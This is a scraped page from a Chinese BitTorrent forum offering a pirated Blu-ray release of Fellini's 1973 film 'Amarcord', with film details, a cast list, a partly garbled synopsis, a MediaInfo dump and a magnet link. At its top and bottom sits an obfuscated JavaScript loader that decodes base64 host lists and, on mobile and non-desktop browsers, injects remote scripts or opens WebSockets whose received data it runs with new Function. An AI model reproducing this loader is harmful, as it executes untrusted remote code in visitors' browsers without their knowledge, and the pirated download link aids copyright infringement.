阿玛柯德[中文字幕].Amarcord.1973.1080p.BluRay.DD2.0.x265-10bit 10.17GB

版主小s 1月前 195

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 阿玛柯德 / 我记得 / 想当年(港) / 阿玛珂德(台) / 当年事 / 童年事,我记得 / 我记得,想当年 / 我的回忆 / I Remember

◎片 名 Amarcord

◎年 代 1973

◎产 地 意大利 / 法国

◎类 别 剧情 / 喜剧

◎语 言 意大利语 / 古希腊语

◎上映日期 1973-12-18(意大利)

◎IMDb链接 https://www.imdb.com/title/tt0071129/

◎豆瓣评分 8.8/10 (12851人评价)

◎豆瓣链接 https://movie.douban.com/subject/1298672/

◎片 长 123分钟

◎导 演 费德里科·费里尼 Federico Fellini (id:1054413)

◎编 剧 费德里科·费里尼 Federico Fellini (id:1054413)

托尼诺·格拉 Tonino Guerra (id:1032838)

◎演 员 普佩拉·玛奇奥 Pupella Maggio (id:1124544)

阿尔曼多·布兰恰 Armando Brancia (id:1077714)

玛加莉·诺埃尔 Magali No?l (id:1012615)

奇乔·因格拉西亚 Ciccio Ingrassia (id:1113595)

南多·奥尔费伊 Nando Orfei (id:1130461)

布鲁诺·扎宁 Bruno Zanin (id:1167270)

吉安菲利波·卡尔卡诺 Gianfilippo Carcano (id:1280055)

约瑟琳·坦齐利 Josiane Tanzilli (id:1155148)

玛利亚·安东涅塔·贝卢齐 Maria Antonietta Beluzzi (id:1057871)

Antonino Faa Di Bruno Antonino Faa Di Bruno (id:1088150)

Aristide Caporale Aristide Caporale (id:1076996)

阿尔瓦罗·维塔利 Alvaro Vitali (id:1156972)

多纳泰拉·甘比尼 Donatella Gambini (id:1335873)

Dina Adorni Dina Adorni (id:1057124)

保罗·巴罗尼 Paolo Baroni (id:1065270)

布鲁诺·贝托奇 Bruno Bertocci (id:1377993)

Marcello Bonini Olas Marcello Bonini Olas (id:1066233)

Dante Cleri Dante Cleri (id:1361637)

Mario Del Vago Mario Del Vago (id:1325996)

弗朗西斯科·马塞利 Francesco Maselli (id:1038006)

Eros Ramazzotti Eros Ramazzotti (id:1056024)

菲德斯·斯塔尼 Fides Stagni (id:1154995)

尼诺·罗塔 Nino Rota (id:1037013)

朱塞佩·罗通诺 Giuseppe Rotunno (id:1032901)

达尼洛·多纳蒂 Danilo Donati (id:1282566)

达尼洛·多纳蒂 Danilo Donati (id:1282566)

Liliane Betti Liliane Betti (id:1278555)

◎标 签 意大利 / 1973 / 喜剧 / 奥斯卡最佳外语片 / 剧情 / 欧洲 / 法国 / 经典

◎简 介

◎1975奧斯卡最佳外語片

◎1974紐約影評人協會最佳導演及最佳影片

三月,空氣中紛飛飄揚著輕軟絮草,教堂的鐘響迴盪在石板路上,小鎮的春天就此揭開序幕。時序回到三零年代亞德里亞海邊的小城,墨索里尼的極右理想仍是信奉的教條,建築工人老爸、家庭主婦老媽、遊手好閒的舅舅、頑皮的小弟,男孩在天主教、法西斯和義大利傳統家庭價值中,迎接他的青春與成長。教室裡捉弄老師的惡作劇、教堂裡擔心手淫的懺悔、鄉村海邊的熱鬧婚宴,費里尼從容隨意地摘選擷取小鎮生活的切片與軼事,密密織就一片記憶之網,在時代洪流與側怂紤浿g相互輝映。

費里尼曾說:「一側怂茏龅募o錄,永遠是,也只能是對他自己的紀錄」。《阿瑪珂德》不但被推崇為其側藢憣嵳Z法的代表作,也被視為他最重要的自傳作品之一。影片一方面帶領觀眾走進費里尼的童年生活,看見他純真誠摯、幽默風趣的情感源頭。在時代景況的描繪上,也...

◎获奖情况 (共3项)

第48届奥斯卡金像奖 (1976)

最佳导演(提名)

└──费德里科·费里尼 (id:1054413)

最佳原创剧本(提名)

第47届奥斯卡金像奖 (1975)

最佳外语片

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 175681304818265625322989319581690476084 (0x842AFD1263B821DB7AF527470567B634)

  4. Complete name : [email protected]

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 10.2 GiB

  8. Duration : 2 h 5 min

  9. Overall bit rate : 11.6 Mb/s

  10. Movie name : Amarcord 1973 1080p BluRay DD2.0 [email protected]

  11. Encoded date : UTC 2021-10-20 00:00:39

  12. Writing application : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  13. Writing library : libebml v1.3.9 + libmatroska v1.5.2


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. Codec ID : V_MPEGH/ISO/HEVC

  20. Duration : 2 h 5 min

  21. Bit rate : 10.9 Mb/s

  22. Width : 1 920 pixels

  23. Height : 1 036 pixels

  24. Display aspect ratio : 1.85:1

  25. Frame rate mode : Constant

  26. Frame rate : 23.976 (24000/1001/53354) FPS

  27. Color space : YUV

  28. Chroma subsampling : 4:2:0

  29. Bit depth : 10 bits

  30. Bits/(Pixel*Frame) : 0.228

  31. Stream size : 9.58 GiB (94%)

  32. Title : @HDSky

  33. Writing library : x265 - H.265/HEVC codec

  34. Default : Yes

  35. Forced : No


  36. Audio

  37. ID : 2

  38. Format : AC-3

  39. Format/Info : Audio Coding 3

  40. Commercial name : Dolby Digital

  41. Codec ID : A_AC3

  42. Duration : 2 h 5 min

  43. Bit rate mode : Constant

  44. Bit rate : 640 kb/s

  45. Channel(s) : 1 channel

  46. Channel layout : C

  47. Sampling rate : 48.0 kHz

  48. Frame rate : 31.250 FPS (1536 SPF)

  49. Compression mode : Lossy

  50. Stream size : 577 MiB (6%)

  51. Title : Italian

  52. Language : Italian

  53. Service kind : Complete Main

  54. Default : Yes

  55. Forced : No


  56. Text #1

  57. ID : 3

  58. Format : PGS

  59. Muxing mode : zlib

  60. Codec ID : S_HDMV/PGS

  61. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  62. Duration : 2 h 1 min

  63. Bit rate : 26.4 kb/s

  64. Count of elements : 2474

  65. Stream size : 22.9 MiB (0%)

  66. Title : CHS

  67. Language : Chinese

  68. Default : Yes

  69. Forced : No


  70. Text #2

  71. ID : 4

  72. Format : PGS

  73. Muxing mode : zlib

  74. Codec ID : S_HDMV/PGS

  75. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  76. Duration : 2 h 1 min

  77. Bit rate : 27.2 kb/s

  78. Count of elements : 2474

  79. Stream size : 23.6 MiB (0%)

  80. Title : CHT

  81. Language : Chinese

  82. Default : No

  83. Forced : No


  84. Menu

  85. 00:00:00.000 : en:Chapter 01

  86. 00:04:21.928 : en:Chapter 02

  87. 00:06:42.902 : en:Chapter 03

  88. 00:11:55.131 : en:Chapter 04

  89. 00:13:47.201 : en:Chapter 05

  90. 00:15:25.967 : en:Chapter 06

  91. 00:23:21.442 : en:Chapter 07

  92. 00:25:33.782 : en:Chapter 08

  93. 00:32:46.631 : en:Chapter 09

  94. 00:37:06.975 : en:Chapter 10

  95. 00:42:55.364 : en:Chapter 11

  96. 00:48:44.004 : en:Chapter 12

  97. 00:52:21.096 : en:Chapter 13

  98. 00:58:03.939 : en:Chapter 14

  99. 01:06:41.831 : en:Chapter 15

  100. 01:09:50.645 : en:Chapter 16

  101. 01:16:50.564 : en:Chapter 17

  102. 01:24:56.091 : en:Chapter 18

  103. 01:31:59.305 : en:Chapter 19

  104. 01:40:08.377 : en:Chapter 20

  105. 01:46:05.192 : en:Chapter 21

  106. 01:50:52.187 : en:Chapter 22

  107. 01:52:39.711 : en:Chapter 23

  108. 01:55:28.839 : en:Chapter 24

  109. 02:00:16.126 : en:Chapter 25




复制代码


TAGS 剧情 喜剧

磁力链:
  • magnet:?xt=urn:btih:9D6053E3692DE9B0CEB4151782BE294E3BC0165E

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};